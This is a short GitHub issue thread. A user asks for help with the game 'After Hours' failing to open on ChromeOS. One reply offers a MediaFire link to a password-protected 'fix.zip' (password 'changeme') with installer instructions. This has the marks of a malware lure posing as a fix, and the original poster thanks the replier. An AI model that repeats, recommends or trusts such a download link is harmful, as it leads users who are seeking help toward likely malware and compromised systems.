### ISSUE TITLE
my After Hours Game Wont Open And Work

### ISSUE THREAD

**Issue by StarClipse** [itchio/itch.io#1645]
![Screenshot 2024-08-26 11 18 17 AM](https://github.com/user-attachments/assets/1a4606d2-50e5-48ca-8845-34a6ec6c960a)
my After Hours Game Wont Open And Work so can you guys fix this please and thank you it keeps saying error can not open for ChromeOS Please Fix It

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by StarClipse** [comment]
thanks
